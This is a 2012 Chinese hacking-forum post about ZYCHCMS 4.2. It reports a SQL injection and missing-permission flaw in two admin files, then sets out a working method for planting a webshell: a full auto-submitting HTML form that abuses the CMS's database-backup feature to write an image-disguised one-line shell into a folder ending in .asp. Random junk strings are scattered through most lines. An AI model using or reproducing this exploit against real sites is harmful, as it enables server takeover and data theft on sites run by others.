找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1808|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
# _( G" B9 |( K
% k1 q) c3 Z! V) E
7 S; W, Y$ n; E, j% _( o
# H% B$ k0 s2 o) h
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
  N/ w7 o3 K1 M5 V+ l ①SQL注射漏洞" G/ K8 @1 \% A- c: _7 m1 M) b3 Y9 M
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
' N% `- V! B( E- f) z 漏洞原因:未过滤
# u3 b, s9 x- s  D& N. I 漏洞代码:* `; {- C# G" p
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
2 I6 R% u5 v7 S) n( E% K7 Y$ b 修复方法:在文件开头加入代码
( d# f  Z; `6 q" I+ x6 c 1 I: V( ]2 p8 _7 e) }& S
$ i, {/ T) E; Y& l
②后台拿WBSHELL1 q/ _0 r. T8 Q* P  p+ s
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
' ^9 J4 P7 c. `2 v& K1 J( k) l 这里在网上找了一个,改了下,将就着用。1 U/ E" H: E) i+ Q8 i/ w. q
以下是代码本地提交代码' c- z( n5 @  D5 r7 U& n% V

  q& A9 _) P  i2 ^
( h6 h0 Z8 @8 z4 v2 f<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
( L8 N0 V, v$ m  X3 j <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>3 Q5 s0 p( e; g* E
<tr>
9 ?1 j& ]1 I0 n. b <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>& ?7 I* j/ n0 h
</tr>: }. y; @  |0 ?- q# t' L) |3 N& j
<tr>
7 b' {! c( H- g$ R2 Q) K5 X <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
5 T& {" t2 o- r </span>
1 Y! b9 S3 Z( \$ p" P3 R& Y <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >( O  V; Z0 u- C
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >8 i+ e  Q6 D' k4 ~
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>' Q  w* M# z  p3 a
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
6 U. L) l+ Y; i1 N3 l <div align=”left”>2 I3 ]( G+ h$ M
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
2 |( C) u. Q: Z% K6 G <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>% x' j; L  }) n+ \# t, y
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />  s, e: P7 q5 g3 I' |2 n3 _- c
</div></td>
/ F2 @! J# _) l7 l5 v; i5 b4 m </tr>
1 _0 {- {6 p, |4 l. D/ z <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>$ N, @; R8 S; I' }' Y
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>+ `- _4 e1 k9 j7 s7 u% |: k
<td class=”td”><div align=”left”>
# S/ R9 o8 S6 B, H8 b <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
2 g8 v% _2 i) D* p [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>; ?7 }4 r9 A- Q* }
</tr>
( s9 m9 k. G7 r+ z* f5 ~: P# D <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>' B0 Q7 p! H4 F: G% D- v
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
3 c# k" Q  C4 T: S <td class=”td”><div align=”left”>  x) w% M4 e4 b, A: w! H) k
<input type=”submit” value=”确定备份” class=”btn”/ o  N! a  k, ?' E
</div></td>
) V' p+ S: U) @) a9 H </tr>
: G# t. ^1 a5 ]: ~ </table></td></tr></form>6 o7 z. ^* b3 u6 ^7 n9 c
</table>
; `. _6 R# C4 d/ A5 E </td>
8 `$ b- n8 u" f3 q* h7 { </tr># L  ^2 @: H$ e4 z0 u8 D) W
</table>
5 L) Y) |8 u, J <script>
2 o9 E; s7 b+ ]1 v document.all.add.submit();" e( [9 g  O- S* H* v) V
</script>) D/ Y& r. A3 t% F5 A) T; u
! u3 T! v( `# X& e" A6 D+ F; @

0 x* K  N, f& g& z: j* ]5 M7 V+ J) u' N# l4 i
! N5 L, j, }% `1 b* L
- q7 t, {# D4 x3 d
1 R6 N  q7 z; v  l. g6 P
% W! e5 ^, \* R3 [9 S

5 F9 u  E  R9 [9 G4 j" F: f. x% Y, d% i) P. V8 S& ]

6 @9 j. t/ f- P5 H* W$ b4 o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表